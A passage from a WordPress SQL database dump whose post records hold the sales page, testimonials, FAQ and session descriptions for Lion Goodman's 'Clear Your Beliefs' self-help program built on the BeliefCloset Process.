I continue to use, both in my practice and in my own personal growth.”</em>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>"I uncovered beliefs I didn''t know I had, including: “I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.” It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<strong>– M.M., International Business Consultant</strong>\n\n&nbsp;\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd">Purchase</a>\n\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-11 20:28:34', '2014-12-12 01:28:34', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2007, 2, '2014-12-11 23:17:46', '2014-12-12 04:17:46', '', 'cb', '', 'inherit', 'closed', 'open', '', 'cb', '', '', '2014-12-11 23:17:46', '2014-12-12 04:17:46', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/12/cb.png', 0, 'attachment', 'image/png', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2009, 2, '2014-12-11 23:48:02', '2014-12-12 04:48:02', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old 